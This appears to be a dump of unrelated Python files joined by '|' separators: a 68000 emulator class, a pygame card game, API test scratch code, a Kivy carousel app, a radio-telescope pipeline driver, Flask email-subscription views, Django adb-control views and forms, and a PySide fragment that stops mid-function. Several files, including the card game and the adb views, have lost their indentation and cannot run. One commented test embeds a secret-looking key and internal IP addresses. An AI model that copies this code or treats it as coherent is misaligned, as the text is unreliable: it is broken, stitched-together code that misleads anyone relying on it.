        Must be a non negative integer that is less than the maximum location size
        :param new_value:
        :return:
        """
        self.set_address_register_value(Register.ProgramCounter, MemoryValue(OpSize.LONG, unsigned_int=new_value))

    def increment_program_counter(self, inc: int):
        """
        Increments the program counter by the given value
        :param inc:
        :return:
        """
        self.set_program_counter_value(
            self.get_program_counter_value() + inc)

    def get_condition_status_code(self, code: ConditionStatusCode) -> bool:
        """
        Gets the status of a code from the Condition Code Register
        :param code:
        :return:
        """
        ccr = self.get_register(Register.CCR).get_value_unsigned()
        # ccr is only 1 byte, bit mask away the bit being looked for
        return (ccr & code) > 0

    def set_condition_status_code(self, code: ConditionStatusCode, value: bool):
        """
        Sets the status of a code from the Condition Code Register to value
        :param code:
        :param value: the new state of the flag bit
        :return:
        """
        ccr = self.get_register(Register.CCR)
        v = ccr.get_value_unsigned()
        if value:
            v |= code
        else:
            v &= ~code
        self._set_condition_code_register_value(MemoryValue(OpSize.BYTE, unsigned_int=v))

    def run(self):
        """
        Starts the automatic execution
        :return:
        """
        if not self.halted:
            if not self.clock_auto_cycle:
                # run a single instruction
                self.step_instruction()
            else:
                while self.clock_auto_cycle:
                    self.step_instruction()

    def halt(self):
        """
        Halts the auto simulation execution
        :return:
        """
        self.clock_auto_cycle = False
        self.halted = True

    def step_instruction(self):
        """
        Increments the clock until the program
        counter increments
        :return:
        """
        if not self.halted:
            # must be here or we get circular dependency issues
            from ..core.util.find_module import find_opcode_cls, valid_opcodes

            for op_str in valid_opcodes:
                op_class = find_opcode_cls(op_str)

                # We don't know this opcode, there's no module for it
                if op_class is None:
                    # BUG FIX: an unconditional 'assert False' used to sit
                    # here, making the 'continue' unreachable and
                    # contradicting the skip-and-continue intent above.
                    print('Opcode {} is not known: skipping and continuing'.format(op_str))
                    continue

                # 10 comes from 2 bytes for the op and max 2 longs which are each 4 bytes
                # note: this currently has the edge case that it will fail unintelligibly
                # if encountered at the end of memory
                pc_val = self.get_program_counter_value()
                op = op_class.disassemble_instruction(self.memory.memory[pc_val:pc_val + 10])
                if op is not None:
                    op.execute(self)
                    # done executing after doing an operation
                    return

    def reload_execution(self):
        """
        restarts execution of the program
        up to the current program counter location
        :return:
        """
        # get the current PC
        # NOTE(review): this is still a stub -- 'current_pc' is unused until
        # the starting location is stored somewhere.
        current_pc = self.get_program_counter_value()

        # reset the PC value
        # todo, need to store the starting location

        # set the starting PC value

        # run until hits that PC value

    def get_cycles(self):
        """
        Returns how many clock cycles have been performed
        :return:
        """
        # NOTE(review): nothing increments _clock_cycles yet, so this always
        # reports 0 until cycle accounting is wired into step_instruction.
        return self._clock_cycles

    def clear_cycles(self):
        """
        Resets the count of clock cycles
        :return:
        """
        self._clock_cycles = 0

    def load_list_file(self, list_file: ListFile):
        """
        Load List File

        load the contents of a list file into memory
        using the locations specified inside of the list file
        :param list_file:
        :return:
        """
        self.memory.load_list_file(list_file)
        self.set_program_counter_value(int(list_file.starting_execution_address))

    def load_memory(self, file : typing.BinaryIO):
        """
        Loads the raw memory from the designated file
        (docstring fixed: it was swapped with save_memory's)
        NOTE: file must be opened as binary or this won't work
        """
        self.memory.load_memory(file)

    def save_memory(self, file : typing.BinaryIO):
        """
        Saves the raw memory into the designated file
        This includes programs
        NOTE: file must be opened as binary or this won't work
        """
        self.memory.save_memory(file)

    def set_ccr_reg(self, extend, negative, zero, overflow, carry):
        """
        Accepts Boolean values for X,N,Z,V, and C, respectively and sets the CCR accordingly.
        Passing None in for any argument will cause it to ignore that bit.
        Returns nothing.
        :param extend:
        :param negative:
        :param zero:
        :param overflow:
        :param carry:
        :return:
        """
        if extend is not None:
            extend = bool(extend)
            self.set_condition_status_code(ConditionStatusCode.X, extend)
        if negative is not None:
            negative = bool(negative)
            self.set_condition_status_code(ConditionStatusCode.N, negative)
        if zero is not None:
            zero = bool(zero)
            self.set_condition_status_code(ConditionStatusCode.Z, zero)
        if overflow is not None:
            overflow = bool(overflow)
            self.set_condition_status_code(ConditionStatusCode.V, overflow)
        if carry is not None:
            carry = bool(carry)
            self.set_condition_status_code(ConditionStatusCode.C, carry)
|
import pygame
import sys
from pygame.locals import *
import Danji_Game_Part
import json
from game import *
import os
class Game_page_C():
def __init__(self,mordern):
self.load()
self.Black = (0,0,0)
self.size = 1012, 596
self.bg_imag = "source/background/Back_Ground3~1.png"
self.GB_img = "source/background/Icon_get_back~1.png"
self.SET_img = "source/background/Icon_Setting~1.png"
self.Game = Game_Rule()
self.P = []
self.P.append(Player("P1"))
self.P.append(Player("AI"))
self.Cards = Card_zu()
self.Place_Area = Placement_Area()
self.name = mordern
self.HeiTao_center = (110 * 2 + 70 ) / 2 , ( 415 * 2 + 100 ) / 2
self.HongXin_center = ( 186 * 2+ 70 ) / 2, ( 415 * 2 + 100 ) / 2
self.FangKuai_center = (262 * 2 + 70) / 2, (415 * 2 + 100) / 2
self.MeiHua_center = (338 * 2 + 70) / 2, (415 * 2 + 100) / 2
self.HeiTao_center_2 = ((947-110) * 2 + 70) / 2, ((596 - 442) * 2 + 100) / 2
self.qipai_center = (535 * 2 + 80) / 2, (280 * 2 + 110) / 2
self.cards_center = (405 * 2 + 80) / 2, (280 * 2 + 110) / 2
self.creat_page()
self.Game_over()
def load(self):
json_path = 'image.json'
f = open(json_path, 'r', encoding='utf-8')
self.img_url_dict = json.load(f)
f.close()
def page_loading(self):
if len(self.P[0].S) > 0:
self.card1 = self.img_url_dict[self.P[0].S[len(self.P[0].S) - 1]]
self.cards1 = pygame.image.load(self.card1).convert_alpha()
self.card1_rect = self.cards1.get_rect()
self.card1_rect.center = self.HeiTao_center
if len(self.P[0].H) > 0:
self.card2 = self.img_url_dict[self.P[0].H[len(self.P[0].H) - 1]]
self.cards2 = pygame.image.load(self.card2).convert_alpha()
self.card2_rect = self.cards2.get_rect()
self.card2_rect.center = self.HongXin_center
if len(self.P[0].D) > 0:
self.card3 = self.img_url_dict[self.P[0].D[len(self.P[0].D) - 1]]
self.cards3 = pygame.image.load(self.card3).convert_alpha()
self.card3_rect = self.cards3.get_rect()
self.card3_rect.center = self.FangKuai_center
if len(self.P[0].C) > 0:
self.card4 = self.img_url_dict[self.P[0].C[len(self.P[0].C) - 1]]
self.cards4 = pygame.image.load(self.card4).convert_alpha()
self.card4_rect = self.cards4.get_rect()
self.card4_rect.center = self.MeiHua_center
if self.P[1].sum > 0:
self.card5 = self.img_url_dict[' ']
self.cards5 = pygame.image.load(self.card5).convert_alpha()
self.card5_rect = self.cards5.get_rect()
self.card5_rect.center = self.HeiTao_center_2
if len(self.Place_Area.card):
card = self.Place_Area.card[len(self.Place_Area.card)-1]
self.card9 = self.img_url_dict.get(card,"source/card/SA.png")
self.cards9 = pygame.image.load(self.card9).convert_alpha()
self.card9_rect = self.cards9.get_rect()
self.card9_rect.center = self.qipai_center
def creat_page(self):
pygame.init()
self.fontObj = pygame.font.Font("source/word_type/word3.TTF", 18)
self.screen = pygame.display.set_mode(self.size)
pygame.display.set_caption(self.name)
self.background = pygame.image.load(self.bg_imag).convert_alpha()
self.GBIMG = pygame.image.load(self.GB_img).convert_alpha()
self.SEIMG = pygame.image.load(self.SET_img).convert_alpha()
self.clock = pygame.time.Clock()
self.who = 0
while(self.Cards.sum):
self.page_loading()
self.screen.blit(self.background, (-20, 0))
self.screen.blit(self.GBIMG, (27, 15))
self.screen.blit(self.SEIMG, (117, 15))
if len(self.P[0].S):
self.screen.blit(self.cards1, self.card1_rect)
if len(self.P[0].H):
self.screen.blit(self.cards2, self.card2_rect)
if len(self.P[0].D):
self.screen.blit(self.cards3, self.card3_rect)
if len(self.P[0].C):
self.screen.blit(self.cards4, self.card4_rect)
if self.P[1].sum:
self.screen.blit(self.cards5, self.card5_rect)
if self.Place_Area.sum:
self.screen.blit(self.cards9,self.card9_rect)
self.screen.blit(self.fontObj.render(f"黑桃:{len(self.P[0].S)}",
False,self.Black),(110,515))
self.screen.blit(self.fontObj.render(f"红心:{len(self.P[0].H)}",
False, self.Black), (186, 515))
self.screen.blit(self.fontObj.render(f"方块:{len(self.P[0].D)}",
False, self.Black), (262, 515))
self.screen.blit(self.fontObj.render(f"梅花:{len(self.P[0].C)}",
False, self.Black), (338, 515))
self.screen.blit(self.fontObj.render(f"AI:{self.P[1].sum}",
False, self.Black), (947-110, 596-442-20))
self.screen.blit(self.fontObj.render(f"弃牌:{self.Place_Area.sum}",
False, self.Black), (535, 390))
self.screen.blit(self.fontObj.render(f"卡组:{self.Cards.sum}",
False, self.Black), (405, 260))
self.screen.blit(self.fontObj.render(f"P{self.who}的回合",
False, self.Black), (150, 150))
pygame.draw.rect(self.screen, self.Black, [110, 415, 70, 100], 1) # P1黑桃
pygame.draw.rect(self.screen, self.Black, [186, 415, 70, 100], 1) # P1心
pygame.draw.rect(self.screen, self.Black, [262, 415, 70, 100], 1) # P1方块
pygame.draw.rect(self.screen, self.Black, [338, 415, 70, 100], 1) # P1梅花
pygame.draw.rect(self.screen, self.Black, [947-110, 596-442, 70, 100], 1) # P2黑桃
pygame.draw.rect(self.screen, self.Black, [40, 25, 80, 30], 1) # fanhui
pygame.draw.rect(self.screen, self.Black, [130, 25, 80, 30], 1) # 设置
pygame.draw.rect(self.screen, self.Black, [535, 280, 80, 110], 1) # 弃牌
pygame.draw.rect(self.screen, self.Black, [405, 280, 80, 110], 1) # 卡组
self.status = 1
while(self.status and self.who == 0):
buttons = pygame.mouse.get_pressed() # 存鼠标状态
x, y = pygame.mouse.get_pos()
card = str()
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
if x >40 and x < 120 and y > 15 and y < 45 and\
event.type == MOUSEBUTTONDOWN:
Danji_Game_Part.danji_page()
if 110 < x < 180 and 415 < y < 515 and\
event.type == MOUSEBUTTONDOWN and len(self.P[0].S) > 0:
card = self.P[0].Knockout_S() #打出黑桃
if 186< x < 256 and 415 < y < 515 and\
event.type == MOUSEBUTTONDOWN and len(self.P[0].H) > 0:
card = self.P[0].Knockout_H() #打出红心
if 262 < x < 332 and 415 < y < 515 and\
event.type == MOUSEBUTTONDOWN and len(self.P[0].D) > 0:
card = self.P[0].Knockout_D() #打出方块
if 338 < x < 408 and 415 < y < 515 and\
event.type == MOUSEBUTTONDOWN and len(self.P[0].C) > 0:
card = self.P[0].Knockout_C() #打出梅花
if 405 < x < 405 + 80 and 280 < y < 280 + 110 and\
event.type == MOUSEBUTTONDOWN:
card = self.Cards.random_card()
if card:
self.Place_Area.Put_in(card)
self.status = 0
pygame.display.update()
while(self.status and self.who):
buttons = pygame.mouse.get_pressed() # 存鼠标状态
x, y = pygame.mouse.get_pos()
card = str()
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
if x >40 and x < 120 and y > 15 and y < 45 and\
event.type == MOUSEBUTTONDOWN:
Danji_Game_Part.danji_page()
if 405 < x < 405 + 80 and 280 < y < 280 + 110 and\
event.type == MOUSEBUTTONDOWN:
card = self.Cards.random_card()
if card:
self.Place_Area.Put_in(card)
self.status = 0
pygame.display.update()
if len(self.Place_Area.card):
print("Place_Area:",self.Place_Area.card)
if self.Game.Whether_Eat_Cards(self.Place_Area):
self.P[self.who].Eat_Cards(self.Place_Area)
self.who = (self.who+1)%2
pygame.display.update()
self.clock.tick(30)
pygame.quit()
def Game_over(self):
    """Show the end-of-game window with both players' totals and the winner.

    The player with the SMALLER sum wins here — presumably ``P[i].sum``
    accumulates penalty points; TODO confirm against the scoring rules.
    Offers two buttons: restart a PVE game or return to the single-player
    menu. Blocks in its own event loop until one is clicked.
    """
    pygame.init()
    pygame.display.set_caption("Game over")
    os.environ['SDL_VIDEO_CENTERED'] = '1'  # center the window on screen
    screen = pygame.display.set_mode((500,240))
    background = pygame.image.load("source/background/登陆界面.gif").convert_alpha()
    clock = pygame.time.Clock()
    while(1):
        screen.blit(background, (0, 0))
        fontObj = pygame.font.Font("source/word_type/word3.TTF", 32)
        # Render both players' totals.
        screen.blit(fontObj.render(f"P1:{self.P[0].sum} P2:{self.P[1].sum}",
                                   False, self.Black), (130, 50))
        if self.P[0].sum < self.P[1].sum:
            screen.blit(fontObj.render("P1 WIN", False, self.Black), (200, 100))
        elif self.P[0].sum > self.P[1].sum:
            screen.blit(fontObj.render("AI WIN", False, self.Black), (200, 100))
        elif self.P[0].sum == self.P[1].sum:
            screen.blit(fontObj.render("平局", False, self.Black), (225, 100))
        fontObj = pygame.font.Font("source/word_type/word3.TTF", 24)
        screen.blit(fontObj.render("继续游戏 结束游戏",
                                   False, self.Black), (130, 200))
        # Outlines for the "continue" and "quit" buttons.
        pygame.draw.rect(screen, self.Black, [130, 200, 24*4, 24], 1)
        pygame.draw.rect(screen, self.Black, [130+24*6.5, 200, 24*4, 24], 1)
        for event in pygame.event.get():
            if event.type == QUIT:
                sys.exit()
            buttons = pygame.mouse.get_pressed()  # current mouse button state
            x, y = pygame.mouse.get_pos()
            # Click inside the "continue" rectangle: restart a PVE game.
            if 130 < x < 130 +24*4 and 200 < y < 200 +24 and \
                    event.type == MOUSEBUTTONDOWN:
                pygame.quit()
                Game_page_C('PVE')
            # Click inside the "quit" rectangle: back to single-player menu.
            if 130+24*6.5 < x < 130 +24*10.5 and 200 < y < 200 +24 and \
                    event.type == MOUSEBUTTONDOWN:
                pygame.quit()
                Danji_Game_Part.danji_page()
        pygame.display.update()
        clock.tick(30)
|
'''
思路: 1、单个api请求能成功
request进行请求
2、用unittest
获取key,syestemd的请求独立成一个函数,方便调用
每个接口写成一个单独的类
3、htmlrunner生成测试报告
'''
#
# #time
# #
# import unittest,requests,hashlib,time,json
# class Api_all(unittest.TestCase):
# def setUp(self):
# self.time =str(int(time.time()*1000))
# m2 =hashlib.md5()
# scr = '722d50a9-28d4-4cba-b226-ca1f1115f37d'+ self.time
# m2.update(scr.encode('utf-8'))
# self.ticket = m2.hexdigest()
# # header = {'publisherId':'1386833104009','timestamp':time1,'ticket':ticket,'systemId':'469b235f-3ef1-4472-9892-055af1ede259'}
# self.header = {'publisherId':'1386833104009','timestamp':self.time,'ticket':self.ticket,'systemId':'469b235f-3ef1-4472-9892-055af1ede259'}
# def test_001(self):
# r= requests.get(url='http://172.16.5.162:8080/mpr/portal-mcrs-openapi/mvc/mprcode/getVendorInfo',headers=self.header,params={'typeId':'0','clientType':'mpr'})
# # print(r.json())
# a= (r.content).decode('utf-8')
# print(json.loads(a).get('respCode'))
# # print((r.content).decode('utf-8'))
# # print(json.loads(r.content))
# # # print(eval(r.text).get('respCode'))
# # a = json.loads(r.text)
# # print(type(a))
# # # a = exec('c='+r.content)
# # # print(a.get('respCode'))
#
#
# # print(self.resp)
#
# def tearDown(self):
# pass
#
# from selenium import webdriver
#
# import time
#
# ob = webdriver.Firefox()
# ob.get("http://172.16.3.112:8080/versionserver/static/index.html#/publish/login")
# time.sleep(6)
#
# ob.find_element_by_tag_name("button").click()
import random
# a = [random.sample(1,34) for i in range(6)]
# print(a)
# a =[i for i in range(1,34)]
# b = random.sample([i for i in range(1,34)],6)
# print(type(b))
# d = random.randint(1,16)
# print(d)
# e = b.append(d)
# print(e)
# c =random.sample([i for i in range(1,34)],6).append(random.randint(1,16))
# print(c)
# Draw one float uniformly from [1, 2) and print it (scratch/demo code).
a = random.uniform(1,2)
print(a)
#
|
__author__ = 'Leandru'
from kivy.app import App
from kivy.core.audio import SoundLoader
from kivy.uix.label import Label
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.popup import Popup
from kivy.uix.image import Image
from kivy.uix.button import Button
from kivy.uix.carousel import Carousel
from kivy.uix.switch import Switch
from kivy.uix.slider import Slider
import sys
class CustomLayout(FloatLayout):
    """Root widget of the app: background image plus a swappable layout
    that hosts the main menu, an image carousel, an options screen
    (music switch + volume slider) and an About popup.
    """

    def __init__(self, **kwargs):
        # Override the inherited initializer, then build our widget tree.
        super(CustomLayout, self).__init__(**kwargs)
        # Toggle counter read by dezactiveaza_volum(): even = music on.
        self.muzica_activa = 0
        # layout0 hosts whichever screen (menu/carousel/options) is active.
        self.layout0 = FloatLayout()
        # Background image, added first so everything else draws on top.
        self.imag1 = Image(source="fundal.jpg")
        self.add_widget(self.imag1)
        self.layout0.size = (600,500)
        self.layout0.size_hint = (None,None)
        self.layout0.padding = 200
        self.imag1.add_widget(self.layout0)
        # Load the background music and start it looping at half volume.
        self.sound = SoundLoader.load('And_So_YouCode Rap_Tarzi.wav')
        self.sound.play()
        self.sound.loop = True
        self.sound.volume = 0.5
        # Show the main menu (argument is the pressed button; unused here).
        self.Menu(None)

    def Menu(self, Buton):
        """Build the main menu screen with its four navigation buttons."""
        self.layout0.clear_widgets()
        # "Carusel" button.
        self.but1 = Button(text = "Carusel", bold =True, background_color = (0,0,1,1))
        self.but1.pos = (300,380)
        self.but1.size_hint = (0.3,0.1)
        self.but1.opacity = 0.7
        self.layout0.add_widget(self.but1)
        # "Optiuni" (options) button.
        self.but2 = Button(text = "Optiuni", bold =True, background_color = (0,0,1,1))
        self.but2.pos = (300,300)
        self.but2.size_hint = (0.3,0.1)
        self.but2.opacity = 0.7
        self.layout0.add_widget(self.but2)
        # "About" button.
        self.but3 = Button(text = "About", bold =True, background_color = (0,0,1,1))
        self.but3.pos = (300,220)
        self.but3.size_hint = (0.3,0.1)
        self.but3.opacity = 0.7
        self.layout0.add_widget(self.but3)
        # "Iesi" (exit) button.
        self.but4 = Button(text = "Iesi", bold =True, background_color = (0,0,1,1))
        self.but4.pos = (300,140)
        self.but4.size_hint = (0.3,0.1)
        self.but4.opacity = 0.7
        self.layout0.add_widget(self.but4)
        # Wire each button press to its screen-changing handler.
        self.but1.bind(on_press = self.CatreCarusel)
        self.but2.bind(on_press = self.Optiuni)
        self.but3.bind(on_press = self.About)
        self.but4.bind(on_press = self.Iesi)

    def CatreCarusel(self, Buton):
        """Replace the menu with a looping image carousel plus a back button."""
        self.layout0.clear_widgets()
        # Images advance to the right when dragged.
        self.carousel = Carousel(direction='right')
        self.carousel.anim_move_duration = 1  # slide animation length (s)
        self.carousel.loop = True
        self.carousel.size_hint = (0.7,0.7)
        self.carousel.pos = (200,120)
        self.carousel.add_widget(self.layout0)
        self.image1 = Image(source="nature1.jpg")
        self.carousel.add_widget(self.image1)
        self.image2 = Image(source="nature2.jpg")
        self.carousel.add_widget(self.image2)
        self.image3 = Image(source="nature3.jpg")
        self.carousel.add_widget(self.image3)
        # BUG FIX: the fourth image was assigned to self.image1 while
        # self.image4 (never defined) was added, raising AttributeError.
        self.image4 = Image(source="nature4.jpg")
        self.carousel.add_widget(self.image4)
        self.eticheta_final = Label(text = "Am ajuns la finalul listei!", font_size = 30)
        self.carousel.add_widget(self.eticheta_final)
        # Back button returning to the main menu.
        self.inapoiButon = Button(text = "Inapoi", bold =True, background_color = (0,0,1,1))
        self.inapoiButon.pos = (200,100)
        self.inapoiButon.size_hint = (0.7,0.1)
        self.inapoiButon.opacity = 0.7
        self.layout0.add_widget(self.inapoiButon)
        self.inapoiButon.bind(on_press = self.Menu)

    def Optiuni(self, Buton):
        """Build the options screen: music on/off switch and volume slider."""
        self.layout0.clear_widgets()
        # On/off switch for the music, active (on) by default.
        self.switch1 = Switch(text="muzica")
        self.switch1.active = True
        self.switch1.size_hint = (0.3,0.2)
        self.switch1.pos = (300,360)
        self.layout0.add_widget(self.switch1)
        self.switch1.bind(active=self.dezactiveaza_volum)
        # Label mirroring the slider's integer value.
        self.arata_volum = Label(text = "volum: 50")
        self.arata_volum.size_hint = (0.3,0.1)
        self.arata_volum.pos = (300,260)
        self.layout0.add_widget(self.arata_volum)
        # Volume slider, 0-100 in steps of 5, starting at 50.
        self.slide_muzica = Slider(min=0, max=100, value=50)
        self.slide_muzica.step = 5
        self.slide_muzica.pos = (300,100)
        self.slide_muzica.size_hint = (0.3,0.5)
        self.slide_muzica.orientation = "horizontal"
        self.layout0.add_widget(self.slide_muzica)
        self.slide_muzica.bind(value=self.valoare_volum)
        # Back button returning to the main menu.
        self.inapoiButon = Button(text = "Inapoi", bold =True, background_color = (0,0,1,1))
        self.inapoiButon.pos = (300,120)
        self.inapoiButon.size_hint = (0.3,0.1)
        self.inapoiButon.opacity = 0.7
        self.layout0.add_widget(self.inapoiButon)
        self.inapoiButon.bind(on_press=self.Menu)

    def Iesi(self, Buton):
        """Exit the application."""
        sys.exit()

    def valoare_volum(self, x, y):
        """Slider callback: update the label and set the music volume (0-1)."""
        self.arata_volum.text = "volum: " + str(int(self.slide_muzica.value))
        self.sound.volume = self.slide_muzica.value/100

    def dezactiveaza_volum(self, x, y):
        """Switch callback: mute/unmute by toggling the slider.

        Uses the parity of self.muzica_activa as the toggle state; the
        previous volume is stashed on the slider so unmuting restores it.
        """
        if (self.muzica_activa %2 == 0):
            # Mute: disable the slider and remember its value.
            self.slide_muzica.disabled = True
            self.slide_muzica.value_temp = int(self.slide_muzica.value)
            self.slide_muzica.value = 0
        else:
            # Unmute: re-enable the slider and restore the stored volume.
            self.slide_muzica.disabled = False
            self.slide_muzica.value = int(self.slide_muzica.value_temp)
            self.sound.play()
        # Count the toggle so the next call flips the other way.
        self.muzica_activa += 1

    def About(self, Buton):
        """Open a popup crediting the app's creators."""
        # Close button inside the popup.
        self.inchide = Button(text = "Inapoi", background_color = (0,0,1,1))
        self.inchide.pos = (300,120)
        self.inchide.size_hint = (1,0.1)
        self.inchide.bind(on_press=self.inchide_popup)
        self.eticheta = Label(text = "Multumiri InfoAcademy", bold = True, font_size = 24)
        self.layout1 = BoxLayout()
        self.layout1.orientation = "vertical"
        self.layout1.padding = 40
        self.layout1.add_widget(self.eticheta)
        self.layout1.add_widget(self.inchide)
        self.popup = Popup()
        self.popup.background = "fundal4_tema.jpg"
        self.popup.size_hint = (None,None)
        self.popup.size = (400, 400)
        self.popup.title = 'Cine a creat aplicatia?'
        self.popup.content = self.layout1
        self.popup.open()

    def inchide_popup(self, Buton):
        """Dismiss the About popup."""
        self.popup.dismiss()
class CarouselApp(App):
    """Kivy application wrapper; the root widget is a CustomLayout."""

    def build(self):
        # Window/taskbar icon, then hand Kivy the root widget.
        self.icon = "python1.ico"
        root = CustomLayout()
        return root
# Script entry point: start the Kivy application loop.
if __name__ == '__main__':
    CarouselApp().run()
|
#! /usr/bin/python
"""
Driver program for L1-mock.
"""
import argparse
import sys
import logging
import yaml
from ch_L1mock import manager
# Module-level logger plus root logging configured at INFO for the CLI.
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)

# Command-line interface: a single positional argument naming the YAML
# configuration file that drives the mock L1 pipeline.
main_parser = argparse.ArgumentParser(
    description="Run the CHIME FRB L1 processing mock-up.",
)
main_parser.add_argument("config_file",
    type=str,
    metavar="config.yaml",
    help="Configuration file in YAML format. See examples.",
)
def main(p):
    """Parse CLI args with parser *p*, load the YAML config, run a Manager.

    Uses yaml.safe_load rather than the deprecated Loader-less yaml.load:
    the config file is external input and safe_load refuses to construct
    arbitrary Python objects.
    """
    args = p.parse_args()
    with open(args.config_file) as f:
        config = yaml.safe_load(f)
    m = manager.Manager(config)
    m.run()
if __name__ == "__main__":
main(main_parser)
|
"""Email pages."""
import operator
import flask
from dnstwister import app, emailer, repository, stats_store
import dnstwister.tools as tools
import dnstwister.tools.email as email_tools
from dnstwister.configuration import features
# User-facing validation messages; URL path segments index into this
# tuple (see email_subscribe_get_email).
ERRORS = (
    'Email address is required',
)
def raise_not_found_if_not_flagged_on():
    """Abort with a 404 unless the email feature flag is enabled."""
    if features.enable_emails():
        return
    flask.abort(404)
@app.route('/email/subscribe/<hexdomain>')
@app.route('/email/subscribe/<hexdomain>/<error>')
def email_subscribe_get_email(hexdomain, error=None):
    """Render the subscription form for a hex-encoded domain.

    The optional *error* path segment is an index into ERRORS; an invalid
    index is logged and ignored rather than surfaced to the user.
    """
    raise_not_found_if_not_flagged_on()
    domain = tools.parse_domain(hexdomain)
    if domain is None:
        flask.abort(400, 'Malformed domain or domain not represented in hexadecimal format.')
    # Attempt to parse out a validation error.
    error_str = None
    try:
        if error is not None:
            error_idx = int(error)
            if error_idx >= 0:
                error_str = ERRORS[error_idx]
    except (ValueError, IndexError):
        # Narrowed from a bare except: only a non-numeric segment or an
        # out-of-range index means "no such error message".
        app.logger.info(
            'Invalid error index {}'.format(error)
        )
    return flask.render_template(
        'www/email/subscribe.html',
        domain=domain,
        hexdomain=hexdomain,
        error=error_str,
        hide_noisy=flask.request.args.get('hide_noisy') == 'True'
    )
@app.route('/email/pending_verify/<hexdomain>', methods=['POST'])
def email_subscribe_pending_confirm(hexdomain):
    """Record a proposed subscription and email a verification link."""
    raise_not_found_if_not_flagged_on()
    domain = tools.parse_domain(hexdomain)
    if domain is None:
        flask.abort(400, 'Malformed domain or domain not represented in hexadecimal format.')
    form = flask.request.form
    hide_noisy = bool(form.get('hide_noisy'))
    email_address = form['email_address']
    # An empty address bounces the user back to the form with error 0.
    if not email_address.strip():
        return flask.redirect(
            '/email/subscribe/{}/0?hide_noisy={}'.format(hexdomain, hide_noisy)
        )
    verify_code = tools.random_id()
    verify_url = '{}email/verify/{}'.format(flask.request.url_root, verify_code)
    email_body = email_tools.render_email(
        'confirm.html', domain=domain, verify_url=verify_url
    )
    repository.propose_subscription(verify_code, email_address, domain, hide_noisy)
    emailer.send(email_address, 'Please verify your subscription', email_body)
    return flask.render_template('www/email/pending_verify.html', domain=domain)
@app.route('/email/verify/<verify_code>')
def email_subscribe_confirm_email(verify_code):
    """Turn a pending (proposed) subscription into a real one."""
    pending_verify = repository.get_proposition(verify_code)
    if pending_verify is None:
        app.logger.info(
            'Failed to verify a non-existent subscription with id: {}'.format(verify_code)
        )
        return flask.redirect('/')
    domain = pending_verify['domain']
    repository.subscribe_email(
        tools.random_id(),
        pending_verify['email_address'],
        domain,
        bool(pending_verify['hide_noisy']),
    )
    # The proposition is one-shot: drop it once the subscription exists.
    repository.remove_proposition(verify_code)
    return flask.render_template('www/email/subscribed.html', domain=domain)
@app.route('/email/unsubscribe/<sub_id>')
def unsubscribe_user(sub_id):
    """Drop the subscription identified by *sub_id* and show confirmation."""
    repository.unsubscribe(sub_id)
    confirmation_page = flask.render_template('www/email/unsubscribed.html')
    return confirmation_page
@app.route('/email/<sub_id>/noisy')
def email_view_noisy_domains(sub_id):
    """Show the noisy domains not sent in the email.

    This is deliberately bound to the email system as the detection of noisy
    domains is limited to the domains found in email subscriptions.
    """
    subscribed_domain = repository.subscribed_domain(sub_id)
    if subscribed_domain is None:
        app.logger.info(
            'Failed to retrieve sub for id for noisy report: {}'.format(sub_id)
        )
        return flask.redirect('/')
    # Filter the fuzzed variants of the subscribed domain down to the
    # ones the stats store has flagged as noisy.
    noisy_domains = [
        fuzzed['domain-name']
        for fuzzed in tools.fuzzy_domains(subscribed_domain)
        if stats_store.is_noisy(fuzzed['domain-name'])
    ]
    return flask.render_template(
        'www/email/noisy.html',
        domain=subscribed_domain,
        noisy_domains=noisy_domains
    )
|
# Create your views here.
# -*- coding: utf-8 -*-
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template.context import RequestContext
import adb,os
import settings
#处理url里的creat
def index(request):
print 'in Chane'
#return HttpResponse('test index')
data = {}
data['text'] = 'test dffds df'
try:
img_path = os.path.join(settings.STATIC_ROOT,'img')
file_name = os.path.join(img_path,'temp.png')
print 'file_name:',file_name
adb.adb_snap(filename=file_name)
except:
print 'error in adb snap'
img_url = '/static/img/temp.png'
data['img'] = img_url
return render_to_response('adb.html',data)
def ajax_getxy(request):
print 'in ajax_getxy'
#print request.GET
adb_type = int(request.GET['type'])
x1 = int(request.GET['x1'])
y1 = int(request.GET['y1'])
x2 = int(request.GET['x2'])
y2 = int(request.GET['y2'])
x = (x1+x2)/2
y = (y1+y2)/2
#左起点
click_point=(x,y)
swipe_points = (x1,y,x2,y)
if adb_type==1:
print 'click point ',click_point
try:
import adb
adb.adb_touch(x,y)
#print dir(adb)
except:
HttpResponse('error in click point'+str(click_point))
elif adb_type==2:
import adb
swipe_points = (x1,y,x2,y)
adb.adb_swipe(x1,y,x2,y)
print 'swipe' ,swipe_points
elif adb_type==3:
swipe_points = (x2,y,x1,y)
import adb
adb.adb_swipe(x2,y,x1,y)
print 'swipe' ,swipe_points
return HttpResponse('OK') |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 19/8/6 下午4:01
# @Author : liaozz
# @File : forms.py
"""
自我介绍一下
"""
from django import forms
from captcha.fields import CaptchaField
class UserForm(forms.Form):
    """Login form: captcha, username and password."""
    captcha = CaptchaField(label='验证码')
    username = forms.CharField(label="用户名", max_length=128, widget=forms.TextInput(
        attrs={'class': 'form-control', 'placeholder': "Username", 'autofocus': ''}))
    password = forms.CharField(label="密码", max_length=256,
                               widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': "Password"}))
class UserRegForm(forms.Form):
    """Registration form: captcha, username, password + confirmation,
    and an invitation/registration code rendered as a password field.
    """
    captcha = CaptchaField(label='验证码')
    username = forms.CharField(label="用户名", max_length=128, widget=forms.TextInput(
        attrs={'class': 'form-control', 'placeholder': "Username", 'autofocus': ''}))
    password = forms.CharField(label="密码", max_length=256,
                               widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': "Password"}))
    password2 = forms.CharField(label="验证密码", max_length=256,
                                widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': "Password"}))
    reg_code = forms.CharField(label="注册码", max_length=256,
                               widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': "Code"}))
import os
import csv
import sys
from PySide.QtGui import *
from PySide.QtCore import *
from ui_EventList import Ui_EventList
from EventWindow import EventWindow
# Unicode-text compatibility shim: on Python 3, the builtin str already
# handles unicode; on Python 2 fall back to wrapping with unicode().
if sys.version_info >= (3,0):
    from builtins import str as text
else:
    def text( data ):
